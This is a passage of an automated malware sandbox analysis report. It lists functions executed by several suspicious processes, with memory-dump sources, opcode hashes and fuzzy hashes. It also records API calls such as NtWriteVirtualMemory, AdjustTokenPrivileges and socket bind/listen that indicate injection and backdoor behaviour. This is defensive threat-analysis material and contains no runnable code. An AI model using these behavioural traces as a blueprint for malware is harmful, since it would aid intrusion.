Instruction Fuzzy Hash: 6A623F71619A888FEBA4DF1CCC64BE97BE1FFA9304F44416AD44CCB292DB35A944CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E87B1, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ca51d1d33e5b14e15537e20da39c93e65d1de24cc92f41b9f78877af22d70b
Instruction ID: cd59a4b95758191edad2baafc0844623ddd002d40d0ac5cc78dc82f82dc3ca45
Opcode Fuzzy Hash: 98ca51d1d33e5b14e15537e20da39c93e65d1de24cc92f41b9f78877af22d70b
Instruction Fuzzy Hash: 7F121170A0D6C9CFEB61CF2888647E93BE0AF5E344F1502B6E88CD7596DB389548C716

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E0189, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9dccf815036748de78cddad6a12939380a619a91bb3b04774a5f62fdfbf2ce
Instruction ID: 9abef7934d6b92c2f018ee241cd84666a91e81f168aa6a8aa4af6e95b7a64d22
Opcode Fuzzy Hash: 9b9dccf815036748de78cddad6a12939380a619a91bb3b04774a5f62fdfbf2ce
Instruction Fuzzy Hash: 5FD18775A0DBC9CFE756DB18C860BA5BFE1EF9A340F4541EAD088CB293C5289D45CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E5475, Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5bba760894f9ea21818f631b64f88fae64d3619094c72ce2f1e2817429f184
Instruction ID: 2f4ea6046dfda7487a470845bf57a819e68b0b5861521e0937961002bc2c1e05
Opcode Fuzzy Hash: bd5bba760894f9ea21818f631b64f88fae64d3619094c72ce2f1e2817429f184
Instruction Fuzzy Hash: 33B11C7151D7C48FE391DB28C454B5ABBE0BF9A305F5549AEE0C9C72A2CB38D984CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E5970, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f68e5b7de08dd4a2fcf438645e6134957f405765c09b623084837b95c0ce668e
Instruction ID: b0a31d5940b822fca1b5d17ca2f631ebb6c3d3e84e968c07886a2bac110dec71
Opcode Fuzzy Hash: f68e5b7de08dd4a2fcf438645e6134957f405765c09b623084837b95c0ce668e
Instruction Fuzzy Hash: 5CB1117060868E8FEBA4DF28C8A47E93BE0FF59304F540165E80DC7292DB35E984DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E4F56, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82b182f979968b9a70845675762bfbb04dbebe827a56998639e8bccc5cf959d
Instruction ID: ee918f813830eb175b3b0369cc2e08e3c65540906793657a8c0df4154150c0eb
Opcode Fuzzy Hash: c82b182f979968b9a70845675762bfbb04dbebe827a56998639e8bccc5cf959d
Instruction Fuzzy Hash: F7913F70618A8D8FEBB5DF28CC647E93BE1FF5A305F5411A9D84DCB292DA345A40CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E070D, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e932bb8a37549ab56b61c19d41eb050763e14bc2328b03f7a08c3d4866410d
Instruction ID: 2794c3171fe503bac0de26334af7ec648d878837dec6d95df9fb7774bb98db31
Opcode Fuzzy Hash: b8e932bb8a37549ab56b61c19d41eb050763e14bc2328b03f7a08c3d4866410d
Instruction Fuzzy Hash: 2E81E870619A8D8FEBB1DF18C859BE93BE0FF58300F50416AE84DCB291DB749689CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E000B, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8876c375aed03435aecd126bed04a87b741c029522678d8300d828686e53cacb
Instruction ID: 0c9019f6c4dc5f3986e0feac7af040c34e5e38a27cf817663552aaf8386e7e5d
Opcode Fuzzy Hash: 8876c375aed03435aecd126bed04a87b741c029522678d8300d828686e53cacb
Instruction Fuzzy Hash: 1B41C29291EBC14FE7938B644C75161BFB0AF9B200B0E45EBD0D9DA4E7D95C6818C723

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E8E85, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c037728cac39b11c419357b57d2e7212f694d44cebf14e9badedd6cea46d1cf
Instruction ID: e617da63c95fa1515fb1e37519658cf37e79694abfff208620e2bb0f27d52689
Opcode Fuzzy Hash: 9c037728cac39b11c419357b57d2e7212f694d44cebf14e9badedd6cea46d1cf
Instruction Fuzzy Hash: 99614B7051868D8FDB90DF28C8A57E93BE0FF19344F54416AF858C7292DB38E984CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E05A3, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e28311a147bafa9b726617b062190d81b054d9d52fbf39f5a066cfc317fb9c
Instruction ID: fa5578baf06309c80e757194410e79bf644fe2c855ec7c7e17289b080ea992b1
Opcode Fuzzy Hash: 95e28311a147bafa9b726617b062190d81b054d9d52fbf39f5a066cfc317fb9c
Instruction Fuzzy Hash: A1416230A1CA498FE765EB28C8A1BA9B7E1FFD9310F444579C08DC7292CE386845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E8753, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca02502c1d34f53822fcc93d3282fa7b788232cb1a2dbe4097388cc80b76db4a
Instruction ID: 9966150dc0db17de81b0b0bead347da8fc2bd670eeac4bf66b387a16958be814
Opcode Fuzzy Hash: ca02502c1d34f53822fcc93d3282fa7b788232cb1a2dbe4097388cc80b76db4a
Instruction Fuzzy Hash: 5BF01230E5CD4D8BDB24EF549C916E677A4FB55314F00016AD50D87186DB3679449B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067E32E1, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.611327067.00007FFD067E0000.00000040.00000001.sdmp, Offset: 00007FFD067E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c882c991275906672438188d860774bb9d99320a51d807eedc508bb7aff9604
Instruction ID: a29d4aeeb080a42006b55b0eaac7f52827dbd7434c95b17a9a050b0cb58e9878
Opcode Fuzzy Hash: 8c882c991275906672438188d860774bb9d99320a51d807eedc508bb7aff9604
Instruction Fuzzy Hash: E8E0ED709A8ECC8FDB24EF549C916DA77A4FB54315F000266E90CC7241DB35B9558B81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244 Parent PID: 3440 d4c6a6df7bab3dad31763de990c4ed82.exeCOMMON

Executed Functions

Function 00007FFD06803985, Relevance: 5.7, Strings: 3, Instructions: 1975COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD06803F4E
", xrefs: 00007FFD06803FA4
", xrefs: 00007FFD06804068

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID: "$"$"
API String ID: 0-1295155676
Opcode ID: 5dc81f5e0b3e5d40f66de8db8659a8e1209ef2aedd080e3d30a2361f0f66e193
Instruction ID: a28ef2c8c5ddc1ac4a4a5e9f06ed27f45ae46e1d02693c50fc141a68a0dfb7db
Opcode Fuzzy Hash: 5dc81f5e0b3e5d40f66de8db8659a8e1209ef2aedd080e3d30a2361f0f66e193
Instruction Fuzzy Hash: 36F22470618A8D8FEBB5DF28C854BE97BE1FF5A300F540569D84DCB292DB34AA45CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD06800ADD, Relevance: 4.2, Strings: 1, Instructions: 3000COMMON

Download Yara Rule

Strings

PC6e, xrefs: 00007FFD06801434

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID: PC6e
API String ID: 0-743565189
Opcode ID: 3c7aafb418b31c7fed0bdd67802cff169b37736d1857d30b96d0b56216980281
Instruction ID: 58614c94c8c5aea0dbd1e8f29bc2601d5a12cda04097a531f02fd3ed5f45e4e4
Opcode Fuzzy Hash: 3c7aafb418b31c7fed0bdd67802cff169b37736d1857d30b96d0b56216980281
Instruction Fuzzy Hash: B0430F70A19A8D8FEBB5DF28C854BE97BE1FF59300F540569D84DCB292DB34AA40CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD06800189, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8b0961f3645bb5d65ddc8c45fc9502ef686aa9b329ffcd59666af25e579442
Instruction ID: 3b33892d0935e46409294018cbe964831b5b748b44cc13f28ea2559d8a385dbd
Opcode Fuzzy Hash: ba8b0961f3645bb5d65ddc8c45fc9502ef686aa9b329ffcd59666af25e579442
Instruction Fuzzy Hash: C5D1A875A0DBC98FE786DB18C860B55BFE1EF9B344F4545EAD088CB293C5289C45CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD06805825, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edb12f19fc849f2db44fe60416ac5fc551222ab58e2097628f454a0f5ee85ab
Instruction ID: 486f9c7875e8f0e425a6e770bd40dab0d8894eed76f6a8159831f8cf7ded8384
Opcode Fuzzy Hash: 4edb12f19fc849f2db44fe60416ac5fc551222ab58e2097628f454a0f5ee85ab
Instruction Fuzzy Hash: B4D13E70618A8D8FEB90DF1CC894BE97BE0FF59344F5445A9E84CCB292DB34A984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD0680070D, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da289b1f98e35306c193907dc2a498d6e285709d547f72d9981c4eacfb14786
Instruction ID: d5aa85ee628df5faccbf2766c9cbc3e641add0c513cda6be63817b3fafc0edb5
Opcode Fuzzy Hash: 6da289b1f98e35306c193907dc2a498d6e285709d547f72d9981c4eacfb14786
Instruction Fuzzy Hash: 0081E870619A8D8FEBB1DF18C855BE97BE0FF18300F50456AD84DCB291DB74A689CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD0680000B, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424460aa67d3f535b57cf29990a1e01c251d13196467d0fa0be9eb0a41a7a105
Instruction ID: 443ae89e3b91add693fdfb5f1718ae096fb1d6aff407e7f8a4083eeecd8e8f5c
Opcode Fuzzy Hash: 424460aa67d3f535b57cf29990a1e01c251d13196467d0fa0be9eb0a41a7a105
Instruction Fuzzy Hash: 52417662A0EBC15FE7838B744C79A657FB0AE57204B0E45EBD4D8CB0E7D91C5809C722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD068005A3, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b485f6f5561bf695a21be6852ce7d9bfa592ae4172ef03b0630e907e8148f8
Instruction ID: bf03721c8d414b1cff1ceb143b14463157affbb1418c78f6d2e22665b9b0533e
Opcode Fuzzy Hash: 73b485f6f5561bf695a21be6852ce7d9bfa592ae4172ef03b0630e907e8148f8
Instruction Fuzzy Hash: 2A41627061CB458FF7A5EB28C891BA9B7E1FF99310F544579C08DC3292CE386845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD068052D3, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.397304983.00007FFD06800000.00000040.00000001.sdmp, Offset: 00007FFD06800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa71855092f198b652fc123c3a89f709b58a09f8bedb5a4b897b1ee18a684d0
Instruction ID: 88ad6a1e85a59e7f1324e16fed9bbd46b3669f3eaaeebaa718c01fc27acda1b1
Opcode Fuzzy Hash: 6fa71855092f198b652fc123c3a89f709b58a09f8bedb5a4b897b1ee18a684d0
Instruction Fuzzy Hash: 33E06D30868E8D8BDB64FF188CA15FA77A4FF14302F000666E50CD7242DE35A6648B81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: tmp87E4.tmp.exe PID: 5036 Parent PID: 1068 tmp87E4.tmp.exeCOMMON

Executed Functions

Function 00F4617C, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F46252

Memory Dump Source

Source File: 0000000C.00000002.600549632.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: db2bebd40b11604fdeaae21315cf9f766e289996ce2e752ab450949cd58e10bf
Instruction ID: da99a484e423d02b20ec9caf2ae1b02c6d0ceeaf34a3750f9c6846bae1c81f9c
Opcode Fuzzy Hash: db2bebd40b11604fdeaae21315cf9f766e289996ce2e752ab450949cd58e10bf
Instruction Fuzzy Hash: 483163B0D042599FDF14CFA8C9867DEBFB1AB49314F14812AD815EB380D7B89881CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00F43614, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F46252

Memory Dump Source

Source File: 0000000C.00000002.600549632.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 37817bcc67c2c1a5acdb4e5818986e724561d815c8a965a17e0b7fc38aacb605
Instruction ID: 571383545d2022d0369415a2b23697af81a70aee6a0ced41c8b1d6d8bb97af88
Opcode Fuzzy Hash: 37817bcc67c2c1a5acdb4e5818986e724561d815c8a965a17e0b7fc38aacb605
Instruction Fuzzy Hash: 853143B0D042599FDF14CFA8C88579EBFB1BB49314F148129E815EB380D7B89885CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00EED4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.600387058.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98be4c8717f4de209d16ac98f6ace1c86201f43151ec6e6b8b6e3699120d10
Instruction ID: f0649e87b171f6eaedd86761a82e11ecdd6874e9cce1c1eb74d98583689234df
Opcode Fuzzy Hash: fb98be4c8717f4de209d16ac98f6ace1c86201f43151ec6e6b8b6e3699120d10
Instruction Fuzzy Hash: E62167B150C288DFDF01CF44DDC0B66BF61FB98328F248569E9095B246C336D80ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3B4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.600387058.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2741209627c99c5e0fa9cf506bd8b6cc7ee9f71c23830feb9e2a440cfa3fcd
Instruction ID: 9c1956324eff69673b3554f034bbec8bd2a7fdcfa01090b34db7214237eafdbb
Opcode Fuzzy Hash: fd2741209627c99c5e0fa9cf506bd8b6cc7ee9f71c23830feb9e2a440cfa3fcd
Instruction Fuzzy Hash: E4213DB150C288DFDB01DF15DCC0F66BB65FBA8328F24C569E9095B246C336E856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3AF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.600387058.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3cb3e44370515572fb733351235636ff71e6e31c7d1222fc57b3ac88bc4a795
Instruction ID: 43c85863063205ffa69edb52ecc02ccf76484a90b579f8e3c4a17465c63b889e
Opcode Fuzzy Hash: f3cb3e44370515572fb733351235636ff71e6e31c7d1222fc57b3ac88bc4a795
Instruction Fuzzy Hash: 2E1108B6408284CFDF12CF10D9C4B16BF71FB94324F24C6A9D8455B656C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.600387058.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3cb3e44370515572fb733351235636ff71e6e31c7d1222fc57b3ac88bc4a795
Instruction ID: 2649324c92d3a285189e3cf1854ddb087c5a9e58a0f306a43353cc9cdd76730c
Opcode Fuzzy Hash: f3cb3e44370515572fb733351235636ff71e6e31c7d1222fc57b3ac88bc4a795
Instruction Fuzzy Hash: 0611E676808284CFDF12CF14D9C4B56BF71FB94328F24C6A9D8055B656C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: tmpFB21.tmp.exe PID: 4928 Parent PID: 1068 tmpFB21.tmp.exeCOMMON

Executed Functions

Function 02C96048, Relevance: 15.9, Strings: 12, Instructions: 868COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 02C96E63
:@Dr, xrefs: 02C96B09
:@Dr, xrefs: 02C9632B
:@Dr, xrefs: 02C96D44
:@Dr, xrefs: 02C9611F
:@Dr, xrefs: 02C96C25
:@Dr, xrefs: 02C969ED
:@Dr, xrefs: 02C96428
:@Dr, xrefs: 02C9622E
:@Dr, xrefs: 02C96622
:@Dr, xrefs: 02C96787
:@Dr, xrefs: 02C96525

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr
API String ID: 0-3530142614
Opcode ID: e74f7f48518ea202957e867427c80f03cc58cae4f3e5d3e78b1923cafee8b7e9
Instruction ID: e941353016eb776ed085fe25895f9d8d936902491ba07d0099f06090f6a480c6
Opcode Fuzzy Hash: e74f7f48518ea202957e867427c80f03cc58cae4f3e5d3e78b1923cafee8b7e9
Instruction Fuzzy Hash: 7292E474A01228CFDB25DF68C850BDEBBB2AF89304F5090E9DA4867390DB359E91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02C96038, Relevance: 7.9, Strings: 6, Instructions: 384COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 02C9632B
:@Dr, xrefs: 02C9611F
:@Dr, xrefs: 02C96428
:@Dr, xrefs: 02C9622E
:@Dr, xrefs: 02C96622
:@Dr, xrefs: 02C96525

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr$:@Dr$:@Dr$:@Dr
API String ID: 0-2816601647
Opcode ID: 0d69f9020fc5feb2e26607352aeffe4819a7c579ff0ce3edce3b698a98d695a8
Instruction ID: f4400588b8d3da83f5b33d606d4ef62bf4eeb501fa144ea1bf51561ad91c1c21
Opcode Fuzzy Hash: 0d69f9020fc5feb2e26607352aeffe4819a7c579ff0ce3edce3b698a98d695a8
Instruction Fuzzy Hash: 9402B574A412288FDB64DF68C850BEEBBB2AF8A304F1090E9DA4963350DB355E91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02C97C30, Relevance: 7.8, Strings: 5, Instructions: 1557COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 02C98048
:@Dr, xrefs: 02C98E0A
:@Dr, xrefs: 02C985EA
>_Ir, xrefs: 02C97C8B
:@Dr, xrefs: 02C99382

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr$:@Dr$>_Ir
API String ID: 0-186666600
Opcode ID: e56c9584bd38b52fe8de474f6d86b99c2473c128dc06ab18dd8ef114b05b734f
Instruction ID: fa33fdfa58895d33e4b894863c470ad24c61cadf7e4105b22453f3b87329b554
Opcode Fuzzy Hash: e56c9584bd38b52fe8de474f6d86b99c2473c128dc06ab18dd8ef114b05b734f
Instruction Fuzzy Hash: B9F2D274A01229CFDB65DF68C998B9DBBB2BF89304F5081E9D908A7350DB359E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02C91DA8, Relevance: 1.6, Instructions: 1631COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d725a9f0c6794df7687562d50f5bd245324690cf88c47db9906af62469a41dfc
Instruction ID: 494cabfa1d9d6d09967a51701b272e0fd2c9b278ac1e7963b6e97e25752004a9
Opcode Fuzzy Hash: d725a9f0c6794df7687562d50f5bd245324690cf88c47db9906af62469a41dfc
Instruction Fuzzy Hash: 2103D074E012688FDB65DF68C984BADB7B6BB89304F1084EAD509A7290DB359FC1CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0A50, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

listen.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0AE4

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: bf2671c1afab089d4524521a66a0941ceb6e15251aac764a3870011b534e084d
Instruction ID: b8621cc9bf16e9342ee1d7e84938cb10a3c19e2e6d2e4f0b62022b377640fcf0
Opcode Fuzzy Hash: bf2671c1afab089d4524521a66a0941ceb6e15251aac764a3870011b534e084d
Instruction Fuzzy Hash: 7521D0B1405780AFE7128B14DC85F96BFA8EF42324F1980AAEA449F192D3646905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0F93, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC1027

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 6af8cfac073af0bd4d62bc9756e88dd0fc6f84a70252f705c7da122925fdc58a
Instruction ID: d0118d45c7091d5985613d49fb02b7b7a350b9c4225b498ef1968b1459797394
Opcode Fuzzy Hash: 6af8cfac073af0bd4d62bc9756e88dd0fc6f84a70252f705c7da122925fdc58a
Instruction Fuzzy Hash: A0219171409380AFD7128B65CC85F96BFB8EF46320F1884ABEA44DF252D364A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC54C3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02CC5543

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ac466b03b52354b0183c37a61db8b97a228f050fe8c75faf7b38bdcd53b31bf8
Instruction ID: cb4bf744335f4559eda70261e7f9928eb4606f1f0c5dd0ffa18be7623259a300
Opcode Fuzzy Hash: ac466b03b52354b0183c37a61db8b97a228f050fe8c75faf7b38bdcd53b31bf8
Instruction Fuzzy Hash: EC21D176509380AFEB22CF25DC40B52BFF4EF46214F0884DAE9858F163D370A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0FC6, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC1027

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 63f94201685709920294a3f218bb368def4db4d387fe35c73b24910dd6b07681
Instruction ID: e321b9dbb23b514045eb2bebe01c9bd011d1b57a5dbf8d707e0c280b8fdbf192
Opcode Fuzzy Hash: 63f94201685709920294a3f218bb368def4db4d387fe35c73b24910dd6b07681
Instruction Fuzzy Hash: 9C11B271500240AEE720DF56DC85F97FBA8EF45720F18846BEE09AB242D6B4E504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5590, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 02CC5605

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 297d29e397ee53fc68c679f87fef68986b1c76fa6d716b6b57b60ebeabadfeed
Instruction ID: abeb016c2beae2e152ebed5359de17b7d383953793a4fcf5bccec4385ce4904b
Opcode Fuzzy Hash: 297d29e397ee53fc68c679f87fef68986b1c76fa6d716b6b57b60ebeabadfeed
Instruction Fuzzy Hash: 342190724097C09FDB128B21DC55A92BFB0EF47314F0D84DAE9845F263D275A908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC56ED, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 02CC5758

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 55e06d296fb6418629b36bc5e9dc490d5f41df13a5ace0e25417bb9961824dbd
Instruction ID: c1a6624213b265393511a87f74615a027959acaa46866feaee62cd5f50c94c2e
Opcode Fuzzy Hash: 55e06d296fb6418629b36bc5e9dc490d5f41df13a5ace0e25417bb9961824dbd
Instruction Fuzzy Hash: 4511AF71408380AFDB228F55DC44BA2FFB4EF46220F08849AEE849B112D375A558DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

listen.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0AE4

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: 9022ed0ce46f3f2af67a8697c29d69e9fd4ee5bf1eff34b7a083dd43d5b327af
Instruction ID: 94965fca8b2f082108800fb5edbab96a71c90d14a6a75e3fd0586e887de2aec1
Opcode Fuzzy Hash: 9022ed0ce46f3f2af67a8697c29d69e9fd4ee5bf1eff34b7a083dd43d5b327af
Instruction Fuzzy Hash: 7511E571500204EEEB21DF15DC85FA7FB98EF45324F2484ABEE049F241E674A505CBB1

Uniqueness

